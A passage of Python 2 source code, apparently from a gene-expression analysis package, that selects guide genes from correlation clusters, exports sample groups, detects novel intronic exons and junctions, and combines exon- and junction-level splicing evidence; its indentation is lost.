block_db[block] = [i] ### store the row index
i+=1
if ReDefinedClusterBlocks:
### Produces a filtered-down and centroid organized heatmap text file
exportReDefinedClusterBlocks(results_file,block_db,rho_cutoff)
if hits_to_report == 1:
if len(block_db)<4 and forceOutput==False:
return 'TooFewBlocks', None
guideGenes={}
### Select the top TFs or non-TFs with the most gene correlations
for b in block_db:
corr_counts_gene = []; cell_cycle_count=[]
#print len(block_db), b, map(lambda i: row_header[i],block_db[b])
for (gene,i) in map(lambda i: (row_header[i],i),block_db[b]):
corr_counts_gene.append((len(gene_corr_counts[gene][1]),gene_corr_counts[gene][0],gene))
if gene in cell_cycle:
cell_cycle_count.append(gene)
corr_counts_gene.sort(); tfs=[]
#print b, corr_counts_gene, '***',len(cell_cycle_count)
if (len(cell_cycle_count)>1) or (len(corr_counts_gene)<4 and (len(cell_cycle_count)>0)): pass
else:
tf_count=0
for (r,t, gene) in corr_counts_gene:
if gene in TFs:
if gene not in cell_cycle:
if restrictTFs==True and tf_count==0: pass
else:
guideGenes[gene]=[]
tf_count+=1
if len(tfs)==0: ### note: tfs is never appended to above, so the top-correlated gene in the block is always added as a guide
gene = corr_counts_gene[-1][-1]
if gene in cell_cycle and LegacyMode: pass
else:
guideGenes[gene]=[]
#block_db[b]= [corr_counts_gene[-1][-1]] ### save just the selected gene indexes
### Additional filter to remove guides that will bring in cell cycle genes (the more guides the more likely)
if excludeCellCycle == 'strict':
#print 'guides',len(guideGenes)
guideCorrelated = numpyCorrelationMatrixGeneAlt(matrix,row_header,guideGenes,gene_to_symbol_db,rho_cutoff)
guideGenes={}
for gene in guideCorrelated:
cell_cycle_count=[]
for corr_gene in guideCorrelated[gene]:
if corr_gene in cell_cycle: cell_cycle_count.append(corr_gene)
#print gene, len(cell_cycle_count),len(guideCorrelated[gene])
if (float(len(cell_cycle_count))/len(guideCorrelated[gene]))>.15 or (len(guideCorrelated[gene])<4 and (len(cell_cycle_count)>0)):
print gene, cell_cycle_count
addition_cell_cycle_associated.append(gene)
pass
else:
guideGenes[gene]=[]
print 'additional Cell Cycle guide genes removed:',addition_cell_cycle_associated
for ADT in ADTs: guideGenes[ADT]=[]
print len(guideGenes), 'novel guide genes discovered:', guideGenes.keys()
return guideGenes,addition_cell_cycle_associated
def greaterThan(x,results_file,numSamplesClustered):
if 'alt_junctions' not in results_file and Platform == None:
if x>(numSamplesClustered-1): return 1
else: return 0
else:
return 1
max_block_size=0
### Sometimes the hits_cutoff is too stringent so take the largest size instead
for block in block_db:
indexes = len(block_db[block])
if indexes>max_block_size: max_block_size=indexes
max_block_size-=1
retained_ids={}; final_rows = {}
for block in block_db:
indexes = block_db[block]
#print [block], len(indexes),hits_cutoff,max_block_size
if len(indexes)>hits_cutoff or len(indexes)>max_block_size: ### Increasing this helps get rid of homogeneous clusters of little significance
#if statistics.avg(matrix[indexes[0]][1:]) < -2: print statistics.avg(matrix[indexes[0]][1:]), len(indexes)
gene_names = map(lambda i: row_header[i], indexes)
#if 'Pax6' in gene_names or 'WNT8A' in gene_names: print '******',hits_to_report, gene_names
indexes = indexes[:hits_to_report]
if filter:
new_indexes = []
for index in indexes:
vs = list(matrix[index])
a = map(lambda x: greaterThan(x,results_file,numSamplesClustered),vs)
b=[1]*numSamplesClustered
c = [(i, i+len(b)) for i in range(len(a)) if a[i:i+len(b)] == b]
if len(c)>0: #http://stackoverflow.com/questions/10459493/find-indexes-of-sequence-in-list-in-python
new_indexes.append(index)
"""
vs.sort()
try:
if abs(vs[-5]-vs[5])>6: new_indexes.append(index)
except Exception:
if abs(vs[-1]-vs[1])>6: new_indexes.append(index)"""
indexes = new_indexes
#if block == 1: print map(lambda i:row_header[i],indexes)
#print indexes;sys.exit()
for ls in map(lambda i: [row_header[i]]+map(str,(matrix[i])), indexes):
final_rows[tuple(ls)]=[]
for i in indexes:
retained_ids[row_header[i]]=[]
added_genes=[]
if len(final_rows)==0:
for block in block_db:
indexes = block_db[block]
if len(indexes)>hits_cutoff or len(indexes)>max_block_size:
indexes = indexes[:hits_to_report]
for ls in map(lambda i: [row_header[i]]+map(str,(matrix[i])), indexes):
final_rows[tuple(ls)]=[]
added_genes.append(ls[0])
if len(final_rows)==0:
for block in block_db:
indexes = block_db[block]
for ls in map(lambda i: [row_header[i]]+map(str,(matrix[i])), indexes):
final_rows[tuple(ls)]=[]
added_genes.append(ls[0])
if len(ADTs)>0:
for ADT in ADTs:
if ADT not in added_genes:
ls = [ADT]+map(str,matrix[row_header.index(ADT)]) ### cast values to strings so the later tab-join succeeds
final_rows[tuple(ls)]=[]
#print 'block length:',len(block_db), 'genes retained:',len(retained_ids)
return final_rows, column_header
def exportGroupsFromClusters(cluster_file,expFile,platform,suffix=None):
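### Derive groups. and comps. files from a clustered heatmap text file: row 1 holds the sample names and row 2 the
### column cluster assignments; comparisons are written between consecutively ordered clusters.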
lineNum=1
for line in open(cluster_file,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
if lineNum==1: names = t[2:]; lineNum+=1
elif lineNum==2: clusters = t[2:]; lineNum+=1
else: break
unique_clusters=[] ### Export groups
new_groups_dir = string.replace(expFile,'exp.','groups.')
new_comps_dir = string.replace(expFile,'exp.','comps.')
if suffix != None:
new_groups_dir = new_groups_dir[:-4]+'-'+suffix+'.txt' ###Usually end in ICGS
new_comps_dir = new_comps_dir[:-4]+'-'+suffix+'.txt'
out_obj = export.ExportFile(new_groups_dir)
cluster_number=0
cluster_db={}
for name in names:
cluster = clusters[names.index(name)]
if platform == 'RNASeq':
if 'junction_quantification' not in name and '.bed' not in name:
name = name+'.bed'
elif 'junction_quantification.txt' not in name and '.txt' not in name and '.bed' not in name:
name = name+'.txt'
if ':' in name:
group,name = string.split(name,':')
if group in cluster_db:
clust_num=cluster_db[group]
else:
cluster_number+=1
cluster_db[group] = cluster_number
clust_num = cluster_number
if cluster=='NA': cluster = group
else:
clust_num = cluster
out_obj.write(name+'\t'+str(clust_num)+'\t'+cluster+'\n')
clust_num = str(clust_num)
if clust_num not in unique_clusters: unique_clusters.append(clust_num)
out_obj.close()
comps=[] #Export comps
out_obj = export.ExportFile(new_comps_dir)
""" ### All possible pairwise group comparisons
for c1 in unique_clusters:
for c2 in unique_clusters:
temp=[int(c2),int(c1)]; temp.sort(); temp.reverse()
if c1 != c2 and temp not in comps:
out_obj.write(str(temp[0])+'\t'+str(temp[1])+'\n')
comps.append(temp)
"""
### Simple method comparing each subsequent ordered cluster (HOPACH orders based on relative similarity)
last_cluster = None
for c1 in unique_clusters:
if last_cluster !=None:
out_obj.write(c1+'\t'+last_cluster+'\n')
last_cluster=c1
out_obj.close()
return new_groups_dir
def logTransform(value):
try: v = math.log(value,2)
except Exception: v = math.log(0.001,2)
return str(v)
class MultiCorrelatePatterns():
def __init__(self,expressed_values):
self.expressed_values = expressed_values
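    ### Callable helper (likely used with a multiprocessing pool); rho_cutoff is expected to be a module-level global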
def __call__(self,features_to_correlate):
from scipy import stats
correlated_genes={}
for uid in features_to_correlate:
ref_values = self.expressed_values[uid]
for uid2 in self.expressed_values:
values = self.expressed_values[uid2]
rho,p = stats.pearsonr(values,ref_values)
if rho>rho_cutoff or rho<-1*rho_cutoff:
if uid!=uid2 and rho != 1.0:
try: correlated_genes[uid].append(uid2)
                        except Exception: correlated_genes[uid] = [uid2]
return correlated_genes
def parseCountFile(fn,parseFeature,search_exon_db):
novel_exon_db={}; firstLine=True
unique_genes={}
for line in open(fn,'rU').xreadlines():
key = string.split(line,'\t')[0]
#t = string.split(line,'\t')
if firstLine: firstLine = False
else:
#uid, coordinates = string.split(key,'=')
#values = map(lambda x: float(x), t[1:])
#gene = string.split(uid,':')[0]
#if max(values)>5: unique_genes[gene] = []
if '_' in key: ### Only look at novel exons
#ENSG00000112695:I2.1_75953139=chr6:75953139-75953254
uid, coordinates = string.split(key,'=')
gene = string.split(uid,':')[0]
if parseFeature == 'exons':
if '-' not in uid:
chr,coordinates = string.split(coordinates,':') ### Exclude the chromosome
coord1,coord2 = string.split(coordinates,'-')
intron = string.split(uid,'_')[0]
intron = string.split(intron,':')[1]
first = intron+'_'+coord1
second = intron+'_'+coord2
proceed = True
if first in uid: search_uid = second ### if the first ID is already the one looked for, store the second with the exon ID
elif second in uid: search_uid = first
else:
proceed = False
#print uid, first, second; sys.exit()
#example: ENSG00000160785:E2.15_156170151;E2.16_156170178=chr1:156170151-156170178
if proceed:
try: novel_exon_db[gene].append((uid,search_uid))
except Exception: novel_exon_db[gene] = [(uid,search_uid)]
elif '-' in uid and 'I' in uid: ### get junctions
if gene in search_exon_db:
for (u,search_uid) in search_exon_db[gene]:
#if gene == 'ENSG00000137076': print u,search_uid,uid
if search_uid in uid:
                                novel_exon_db[uid] = u ### Relate the currently examined novel exon ID to the junction not currently associated with it
#if gene == 'ENSG00000137076': print u, uid
#print uid;sys.exit()
#print len(unique_genes); sys.exit()
return novel_exon_db
def getJunctionType(species,fn):
root_dir = string.split(fn,'ExpressionInput')[0]
fn = filepath(root_dir+'AltDatabase/'+species+'/RNASeq/'+species + '_Ensembl_junctions.txt')
firstLine=True
junction_type_db={}; type_db={}
for line in open(fn,'rU').xreadlines():
t = string.split(line,'\t')
if firstLine: firstLine = False
else:
id=t[0]; junction_type = t[8]
if '-' in id:
if 'trans-splicing' in line:
junction_type = 'trans-splicing'
junction_type_db[id] = junction_type
try: type_db[junction_type]+=1
except Exception: type_db[junction_type]=1
print 'Breakdown of event types'
for type in type_db:
print type, type_db[type]
return junction_type_db
def maxCount(ls):
c=0
for i in ls:
if i>0.5: c+=1
return c
def getHighExpNovelExons(species,fn):
""" Idea - if the ranking of exons based on expression changes from one condition to another, alternative splicing is occuring """
junction_type_db = getJunctionType(species,fn)
### Possible issue detected with novel exon reads: ['ENSG00000121577'] ['119364543'] cardiac
exon_max_exp_db={}; uid_key_db={}; firstLine=True
novel_intronic_junctions = {}
novel_intronic_exons = {}
cutoff = 0.2
read_threshold = 0.5
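    ### read_threshold: minimum max read count for a feature to be considered expressed; cutoff: minimum relative-expression ratio exported by expThreshold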
expressed_junction_types={}
features_to_export={}
exon_coord_db={}
for line in open(fn,'rU').xreadlines():
t = string.split(line,'\t')
if firstLine: firstLine = False
else:
key=t[0]
#ENSG00000112695:I2.1_75953139=chr6:75953139-75953254
try: uid, coordinates = string.split(key,'=')
except Exception: uid = key
gene = string.split(uid,':')[0]
values = map(lambda x: float(x), t[1:])
max_read_counts = max(values)
try: exon_max_exp_db[gene].append((max_read_counts,uid))
except Exception: exon_max_exp_db[gene] = [(max_read_counts,uid)]
uid_key_db[uid] = key ### retain the coordinate info
if '-' in uid and (':E' in uid or '-E' in uid):
junction_type = junction_type_db[uid]
if max_read_counts>read_threshold:
samples_expressed = maxCount(values)
if samples_expressed>2:
try: expressed_junction_types[junction_type]+=1
except Exception: expressed_junction_types[junction_type]=1
                        if junction_type == 'trans-splicing' and '_' not in uid:
                            try: expressed_junction_types['known trans-splicing']+=1
                            except Exception: expressed_junction_types['known trans-splicing']=1
elif junction_type == 'novel' and '_' not in uid:
try: expressed_junction_types['novel but known sites']+=1
except Exception: expressed_junction_types['novel but known sites']=1
elif junction_type == 'novel' and 'I' not in uid:
                            try: expressed_junction_types['novel but within 50nt of a known site']+=1
                            except Exception: expressed_junction_types['novel but within 50nt of a known site']=1
elif 'I' in uid and '_' in uid and junction_type!='trans-splicing':
#print uid;sys.exit()
try: expressed_junction_types['novel intronic junctions']+=1
except Exception: expressed_junction_types['novel intronic junctions']=1
coord = string.split(uid,'_')[-1]
if '-' in coord:
coord = string.split(coord,'-')[0]
                        try: novel_intronic_junctions[gene].append(coord)
                        except Exception: novel_intronic_junctions[gene]=[coord]
elif ('I' in uid or 'U' in uid) and '_' in uid and max_read_counts>read_threshold:
if '-' not in uid:
samples_expressed = maxCount(values)
if samples_expressed>2:
try: expressed_junction_types['novel intronic exon']+=1
except Exception: expressed_junction_types['novel intronic exon']=1
coord = string.split(uid,'_')[-1]
#print uid, coord;sys.exit()
#if 'ENSG00000269897' in uid: print [gene,coord]
try: novel_intronic_exons[gene].append(coord)
except Exception: novel_intronic_exons[gene]=[coord]
exon_coord_db[gene,coord]=uid
print 'Expressed (count>%s for at least 3 samples) junctions' % read_threshold
for junction_type in expressed_junction_types:
print junction_type, expressed_junction_types[junction_type]
expressed_junction_types={}
#print len(novel_intronic_junctions)
#print len(novel_intronic_exons)
for gene in novel_intronic_junctions:
if gene in novel_intronic_exons:
for coord in novel_intronic_junctions[gene]:
if coord in novel_intronic_exons[gene]:
try: expressed_junction_types['confirmed novel intronic exons']+=1
except Exception: expressed_junction_types['confirmed novel intronic exons']=1
uid = exon_coord_db[gene,coord]
features_to_export[uid]=[]
#else: print [gene], novel_intronic_junctions[gene]; sys.exit()
for junction_type in expressed_junction_types:
print junction_type, expressed_junction_types[junction_type]
out_file = string.replace(fn,'.txt','-highExp.txt')
print 'Exporting the highest expressed exons to:', out_file
out_obj = export.ExportFile(out_file)
### Compare the relative expression of junctions and exons separately for each gene (junctions are more comparable)
for gene in exon_max_exp_db:
junction_set=[]; exon_set=[]; junction_exp=[]; exon_exp=[]
exon_max_exp_db[gene].sort()
exon_max_exp_db[gene].reverse()
for (exp,uid) in exon_max_exp_db[gene]:
if '-' in uid: junction_set.append((exp,uid)); junction_exp.append(exp)
else: exon_set.append((exp,uid)); exon_exp.append(exp)
if len(junction_set)>0:
maxJunctionExp = junction_set[0][0]
try: lower25th,median_val,upper75th,int_qrt_range = statistics.iqr(junction_exp)
except Exception: print junction_exp;sys.exit()
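            ### If the inter-quartile range is non-zero, use it as the normalization denominator instead of the single max (presumably to reduce outlier influence)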
if int_qrt_range>0:
maxJunctionExp = int_qrt_range
junction_percent_exp = map(lambda x: (x[1],expThreshold(x[0]/maxJunctionExp,cutoff)), junction_set)
high_exp_junctions = []
for (uid,p) in junction_percent_exp: ### ID and percentage of expression
if p!='NA':
if uid in features_to_export: ### novel exons only right now
out_obj.write(uid_key_db[uid]+'\t'+p+'\n') ### write out the original ID with coordinates
if len(exon_set)>0:
maxExonExp = exon_set[0][0]
lower25th,median_val,upper75th,int_qrt_range = statistics.iqr(exon_exp)
if int_qrt_range>0:
maxExonExp = int_qrt_range
exon_percent_exp = map(lambda x: (x[1],expThreshold(x[0]/maxExonExp,cutoff)), exon_set)
high_exp_exons = []
for (uid,p) in exon_percent_exp: ### ID and percentage of expression
if p!='NA':
if uid in features_to_export:
out_obj.write(uid_key_db[uid]+'\t'+p+'\n')
out_obj.close()
def expThreshold(ratio,cutoff):
#print [ratio,cutoff]
if ratio>cutoff: return str(ratio)
else: return 'NA'
def compareExonAndJunctionResults(species,array_type,summary_results_db,root_dir):
results_dir = root_dir +'AltResults/AlternativeOutput/'
dir_list = read_directory(results_dir)
filtered_dir_db={}
#"""
try: novel_exon_junction_db = getNovelExonCoordinates(species,root_dir)
except Exception:
#print traceback.format_exc()
print 'No counts file found.'
novel_exon_junction_db={} ### only relevant to RNA-Seq analyses
for comparison_file in summary_results_db:
for results_file in dir_list:
if (comparison_file in results_file and '-exon-inclusion-results.txt' in results_file) and ('comparison' not in results_file):
try: filtered_dir_db[comparison_file].append(results_file)
except Exception: filtered_dir_db[comparison_file] = [results_file]
try: os.remove(string.split(results_dir,'AltResults')[0]+'AltResults/Clustering/Combined-junction-exon-evidence.txt')
except Exception: pass
for comparison_file in filtered_dir_db:
alt_result_files = filtered_dir_db[comparison_file]
#print alt_result_files, comparison_file
importAltAnalyzeExonResults(alt_result_files,novel_exon_junction_db,results_dir)
#"""
### Build combined clusters of high-confidence exons
graphics2=[]; graphics=[]
import ExpressionBuilder
try:
input_dir = string.split(results_dir,'AltResults')[0]+'GO-Elite/AltExonConfirmed/'
cluster_file, rows_in_file = ExpressionBuilder.buildAltExonClusterInputs(input_dir,species,array_type,dataType='AltExonConfirmed')
if rows_in_file > 5000: useHOPACH = False
else: useHOPACH = True
if rows_in_file < 12000:
graphics = ExpressionBuilder.exportHeatmap(cluster_file,useHOPACH=useHOPACH)
except Exception: pass
try:
input_dir = string.split(results_dir,'AltResults')[0]+'GO-Elite/AltExon/'
cluster_file, rows_in_file = ExpressionBuilder.buildAltExonClusterInputs(input_dir,species,array_type,dataType='AltExon')
if rows_in_file > 5000: useHOPACH = False
else: useHOPACH = True
if rows_in_file < 12000:
graphics2 = ExpressionBuilder.exportHeatmap(cluster_file,useHOPACH=useHOPACH)
except Exception: pass
return graphics+graphics2
class SplicingData:
def __init__(self,score,symbol,description,exonid,probesets,direction,splicing_event,external_exon,genomic_loc,gene_exp,protein_annot,domain_inferred,domain_overlap,method,dataset):
self.score = score; self.dataset = dataset
self.symbol = symbol;
self.description=description;self.exonid=exonid;self.probesets=probesets;self.direction=direction
self.splicing_event=splicing_event;self.external_exon=external_exon;self.genomic_loc=genomic_loc;
self.gene_exp=gene_exp;self.protein_annot=protein_annot;self.domain_inferred=domain_inferred
self.domain_overlap=domain_overlap;self.method=method
def Score(self): return self.score
def setScore(self,score): self.score = score
def GeneExpression(self): return self.gene_exp
def Dataset(self): return self.dataset
def Symbol(self): return self.symbol
def Description(self): return self.description
def ExonID(self): return self.exonid
def appendExonID(self,exonid): self.exonid+='|'+exonid
def Probesets(self): return self.probesets
def ProbesetDisplay(self):
if len(self.Probesets()[1])>0:
return string.join(self.Probesets(),'-')
else:
return self.Probesets()[0]
def ProbesetsSorted(self):
### Don't sort the original list
a = [self.probesets[0],self.probesets[1]]
a.sort()
return a
def Direction(self): return self.direction
def setDirection(self,direction): self.direction = direction
def SplicingEvent(self): return self.splicing_event
def ProteinAnnotation(self): return self.protein_annot
def DomainInferred(self): return self.domain_inferred
def DomainOverlap(self): return self.domain_overlap
def Method(self): return self.method
def setEvidence(self,evidence): self.evidence = evidence
def Evidence(self): return self.evidence
def GenomicLocation(self): return self.genomic_loc
def setExonExpStatus(self, exon_expressed): self.exon_expressed = exon_expressed
def ExonExpStatus(self): return self.exon_expressed
def importAltAnalyzeExonResults(dir_list,novel_exon_junction_db,results_dir):
regulated_critical_exons={}; converted_db={}
includeExonJunctionComps=True ### Allow ASPIRE comparisons with the inclusion feature as an exon to count for additive reciprocal evidence
print "Reading AltAnalyze results file"
root_dir = string.split(results_dir,'AltResults')[0]
for filename in dir_list:
x=0; regulated_critical_exon_temp={}
fn=filepath(results_dir+filename)
new_filename = string.join(string.split(filename,'-')[:-5],'-')
if '_vs_' in filename and '_vs_' in new_filename: export_filename = new_filename
else: export_filename = string.join(string.split(filename,'-')[:-5],'-')
export_path = results_dir+export_filename+'-comparison-evidence.txt'
try: os.remove(filepath(export_path)) ### If we don't do this, the old results get added to the new
except Exception: null=[]
if 'AltMouse' in filename:
altmouse_ensembl_db = importAltMouseEnsembl()
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
if x==0: x=1; #print t[12],t[13],t[22],t[23]
else:
converted = False ### Indicates both junction sides were regulated
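                ### Column layout differs between exon-level (splicing-index/FIRMA) and reciprocal-junction (ASPIRE/linearregres) result files; re-parsed below when needed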
geneid = t[0]; exonid = t[4]; probeset1 = t[6]; probeset2 = ''; score = t[1][:4]; symbol = t[2]; description = t[3]; regions = t[-4]; direction = t[5]
genomic_loc = t[-1]; splicing_event = t[-3]; external_exon = t[-6]; gene_exp_fold = t[-8]; protein_annot = t[14]; domain_inferred = t[15]; domain_overlap = t[17]
expressed_exon = 'NA'
if 'RNASeq' in filename: expressed_exon = 'no' ### Set by default
            if ':' in geneid: geneid = string.split(geneid,':')[0] ### A user reported gene:gene compound IDs appearing (cause unclear); keep only the first gene ID
if 'FIRMA' in fn: method = 'FIRMA'
elif 'splicing-index' in fn: method = 'splicing-index'
if 'ASPIRE' in filename or 'linearregres' in filename:
f1=float(t[12]); f2=float(t[13]); probeset1 = t[8]; probeset2 = t[10]; direction = t[6]; exonid2 = t[5]; splicing_event = t[-4]
protein_annot = t[19]; domain_inferred = t[20]; domain_overlap = t[24]; method = 'linearregres'; regions = t[-5]
exon1_exp=float(t[-15]); exon2_exp=float(t[-14]); fold1=float(t[12]); fold2=float(t[13])
if fold1<0: fold1 = 1 ### don't factor in negative changes
if fold2<0: fold2 = 1 ### don't factor in negative changes
"""
if 'RNASeq' not in filename:
exon1_exp = math.pow(2,exon1_exp)
exon2_exp = math.log(2,exon2_exp)
m1 = exon1_exp*fold1
m2 = exon2_exp*fold2
max_exp = max([m1,m2])
min_exp = min([m1,m2])
percent_exon_expression = str(min_exp/max_exp)
"""
if 'ASPIRE' in filename: method = 'ASPIRE'; score = t[1][:5]
if '-' not in exonid and includeExonJunctionComps == False:
                        exonid=None ### Occurs when the inclusion feature is just an exon (may not indicate confirmation, so exclude)
else: exonid = exonid+' vs. '+exonid2
if 'AltMouse' in filename:
try: geneid = altmouse_ensembl_db[geneid]
except Exception: geneid = geneid
if 'RNASeq' not in filename and 'junction' not in filename: regions = string.replace(regions,'-','.')
else:
if 'RNASeq' in filename and '-' not in exonid:
fold = float(t[10]); exon_exp = float(t[18]); gene_exp = float(t[19])
if fold < 0: fold = -1.0/fold
GE_fold = float(gene_exp_fold)
if GE_fold < 0: GE_fold = -1.0/float(gene_exp_fold)
exon_psi1 = abs(exon_exp)/(abs(gene_exp))
exon_psi2 = (abs(exon_exp)*fold)/(abs(gene_exp)*GE_fold)
max_incl_exon_exp = max([exon_psi1,exon_psi2])
#if max_incl_exon_exp>0.20: expressed_exon = 'yes'
expressed_exon = max_incl_exon_exp
#if 'I2.1_75953139' in probeset1:
#print [exon_exp,gene_exp,exon_exp*fold,gene_exp*GE_fold]
#print exon_psi1, exon_psi2;sys.exit()
probesets = [probeset1,probeset2]
if (method == 'splicing-index' or method == 'FIRMA') and ('-' in exonid) or exonid == None:
pass #exclude junction IDs
else:
regions = string.replace(regions,';','|')
regions = string.replace(regions,'-','|')
regions = string.split(regions,'|')
for region in regions:
if len(region) == 0:
try: region = t[17]+t[18] ### For junction introns where no region ID exists
except Exception: null=[]
                        if ':' in region: region = string.split(region,':')[-1] ### A user reported gene:region compound IDs appearing (cause unclear); keep only the region portion
if probeset1 in novel_exon_junction_db:
uid = novel_exon_junction_db[probeset1] ### convert the uid (alternative exon) to the annotated ID for the novel exon
converted_db[uid] = probeset1
else:
uid = geneid+':'+region
ss = SplicingData(score,symbol,description,exonid,probesets,direction,splicing_event,external_exon,genomic_loc,gene_exp_fold,protein_annot,domain_inferred,domain_overlap,method,filename)
ss.setExonExpStatus(str(expressed_exon))
try: regulated_critical_exon_temp[uid].append(ss)
except Exception: regulated_critical_exon_temp[uid] = [ss]
#print filename, len(regulated_critical_exon_temp)
for uid in regulated_critical_exon_temp:
report=None
if len(regulated_critical_exon_temp[uid])>1:
### We are only reporting one here and that's OK, since we are only reporting the top scores... won't include all inclusion junctions.
scores=[]
for ss in regulated_critical_exon_temp[uid]: scores.append((float(ss.Score()),ss))
scores.sort()
if (scores[0][0]*scores[-1][0])<0:
ss1 = scores[0][1]; ss2 = scores[-1][1]
                if ss1.ProbesetsSorted() == ss2.ProbesetsSorted(): ss1.setDirection('mutual') ### same exons, hence, mutually exclusive event (or similar)
else: ss1.setDirection('both') ### opposite directions in the same comparison-file, hence, conflicting data
report=[ss1]
else:
if abs(scores[0][0])>abs(scores[-1][0]): report=[scores[0][1]]
else: report=[scores[-1][1]]
else:
report=regulated_critical_exon_temp[uid]
### Combine data from different analysis files
try: regulated_critical_exons[uid]+=report
except Exception: regulated_critical_exons[uid]=report
"""if 'ENSG00000204120' in uid:
print uid,
for i in regulated_critical_exon_temp[uid]:
print i.Probesets(),
print ''
"""
        try: report[0].setEvidence(len(regulated_critical_exon_temp[uid])) ### set the number of exons demonstrating regulation of this exon
except Exception: null=[]
clearObjectsFromMemory(regulated_critical_exon_temp)
export_data,status = AppendOrWrite(export_path)
if status == 'not found':
header = string.join(['uid','source-IDs','symbol','description','exonids','independent confirmation','score','regulation direction','alternative exon annotations','associated isoforms','inferred regulated domains','overlapping domains','method','supporting evidence score','novel exon: high-confidence','percent exon expression of gene','differential gene-expression','genomic location'],'\t')+'\n'
export_data.write(header)
combined_export_path = string.split(results_dir,'AltResults')[0]+'AltResults/Clustering/Combined-junction-exon-evidence.txt'
combined_export_data, status= AppendOrWrite(combined_export_path)
if status == 'not found':
header = string.join(['uid','source-IDs','symbol','description','exonids','independent confirmation','score','regulation direction','alternative exon annotations','associated isoforms','inferred regulated domains','overlapping domains','method','supporting evidence score','novel exon: high-confidence','percent exon expression of gene','differential gene-expression','genomic location','comparison'],'\t')+'\n'
combined_export_data.write(header)
print len(regulated_critical_exons), 'regulated exon IDs imported.\n'
print 'writing:',export_path; n=0
# print [len(converted_db)]
### Check for alternative 3' or alternative 5' exon regions that were not matched to the right reciprocal junctions (occurs because only one of the exon regions is called alternative)
regulated_critical_exons_copy={}
for uid in regulated_critical_exons:
regulated_critical_exons_copy[uid]=regulated_critical_exons[uid]
u=0
### This is most applicable to RNA-Seq since the junction IDs correspond to the Exon Regions not the probeset Exon IDs
for uid in regulated_critical_exons_copy: ### Look through the copied version since we can't delete entries while iterating through
ls = regulated_critical_exons_copy[uid]
u+=1
#if u<20: print uid
for jd in ls:
if jd.Method() != 'splicing-index' and jd.Method() != 'FIRMA':
try: ### Applicable to RNA-Seq
gene,exonsEx = string.split(jd.Probesets()[1],':') ### Exclusion probeset will have the exon not annotated as the critical exon (although it should be as well)
gene,exonsIn = string.split(jd.Probesets()[0],':')
except Exception:
gene, ce = string.split(uid,':')
exonsIn, exonsEx = string.split(jd.ExonID(),'vs.')
if gene !=None:
critical_exon = None
five_prime,three_prime = string.split(exonsEx,'-')
try: five_primeIn,three_primeIn = string.split(exonsIn,'-')
                    except Exception: five_primeIn = exonsIn; three_primeIn = exonsIn ### Should only occur during testing when an exon rather than a junction ID is considered
#if gene == 'ENSG00000133083': print five_prime,three_prime, five_primeIn,three_primeIn
if five_primeIn == five_prime: ### Hence, the exclusion 3' exon should be added
critical_exon = gene+':'+three_prime
exonid = three_prime
                    elif three_primeIn == three_prime: ### Hence, the exclusion 5' exon should be added
critical_exon = gene+':'+five_prime
exonid = five_prime
else:
if ('5' in jd.SplicingEvent()) or ('five' in jd.SplicingEvent()):
critical_exon = gene+':'+five_prime
exonid = five_prime
elif ('3' in jd.SplicingEvent()) or ('three' in jd.SplicingEvent()):
critical_exon = gene+':'+three_prime
exonid = three_prime
elif ('alt-N-term' in jd.SplicingEvent()) or ('altPromoter' in jd.SplicingEvent()):
critical_exon = gene+':'+five_prime
exonid = five_prime
elif ('alt-C-term' in jd.SplicingEvent()):
critical_exon = gene+':'+three_prime
exonid = three_prime
#print critical_exon, uid, jd.ExonID(),jd.SplicingEvent(); sys.exit()
if critical_exon != None:
if critical_exon in regulated_critical_exons:
#print uid, critical_exon; sys.exit()
if len(regulated_critical_exons[critical_exon]) == 1:
if len(ls)==1 and uid in regulated_critical_exons: ### Can be deleted by this method
                                    if 'vs.' not in regulated_critical_exons[uid][0].ExonID() and 'vs.' not in regulated_critical_exons[critical_exon][0].ExonID():
regulated_critical_exons[uid].append(regulated_critical_exons[critical_exon][0])
del regulated_critical_exons[critical_exon]
                            elif uid in regulated_critical_exons: ### If two entries already exist
ed = regulated_critical_exons[uid][1]
ed2 = regulated_critical_exons[critical_exon][0]
if 'vs.' not in ed.ExonID() and 'vs.' not in ed2.ExonID():
if ed.Direction() != ed2.Direction(): ### should be opposite directions
ed.appendExonID(exonid)
ed.setEvidence(ed.Evidence()+1)
ed.setScore(ed.Score()+'|'+ed2.Score())
del regulated_critical_exons[critical_exon]
firstEntry=True
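    ### Write one consolidated row per critical exon, combining junction- and exon-level evidence across analysis files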
for uid in regulated_critical_exons:
if uid in converted_db:
converted = True
else: converted = False
#if 'ENSG00000133083' in uid: print [uid]
exon_level_confirmation = 'no'
ls = regulated_critical_exons[uid]
jd = regulated_critical_exons[uid][0] ### We are only reporting one here and that's OK, since we are only reporting the top scores... won't include all inclusion junctions.
if len(ls)>1:
methods = []; scores = []; direction = []; exonids = []; probesets = []; evidence = 0; genomic_location = []
junctionids=[]
junction_data_found = 'no'; exon_data_found = 'no'
for jd in ls:
if jd.Method() == 'ASPIRE' or jd.Method() == 'linearregres':
junction_data_found = 'yes'
methods.append(jd.Method())
scores.append(jd.Score())
direction.append(jd.Direction())
exonids.append(jd.ExonID())
junctionids.append(jd.ExonID())
probesets.append(jd.ProbesetDisplay())
evidence+=jd.Evidence()
genomic_location.append(jd.GenomicLocation())
                    ### Preferentially obtain isoform annotations from the reciprocal analysis, which is likely more accurate
isoform_annotations = [jd.ProteinAnnotation(), jd.DomainInferred(), jd.DomainOverlap()]
for ed in ls:
if ed.Method() == 'splicing-index' or ed.Method() == 'FIRMA':
exon_data_found = 'yes' ### pick one of them
methods.append(ed.Method())
scores.append(ed.Score())
direction.append(ed.Direction())
exonids.append(ed.ExonID())
probesets.append(ed.ProbesetDisplay())
evidence+=ed.Evidence()
genomic_location.append(ed.GenomicLocation())
#isoform_annotations = [ed.ProteinAnnotation(), ed.DomainInferred(), ed.DomainOverlap()]
if junction_data_found == 'yes' and exon_data_found == 'yes':
exon_level_confirmation = 'yes'
for junctions in junctionids:
if 'vs.' in junctions:
j1 = string.split(junctions,' vs. ')[0] ### inclusion exon or junction
if '-' not in j1: ### not a junction, hence, may not be sufficient to use for confirmation (see below)
if 'I' in j1: ### intron feature
if '_' in j1: ### novel predicted exon
exon_level_confirmation = 'no'
else:
exon_level_confirmation = 'yes'
else:
if '_' in j1:
exon_level_confirmation = 'no'
else:
exon_level_confirmation = 'partial'
method = string.join(methods,'|')
unique_direction = unique.unique(direction)
genomic_location = unique.unique(genomic_location)
if len(unique_direction) == 1: direction = unique_direction[0]
else: direction = string.join(direction,'|')
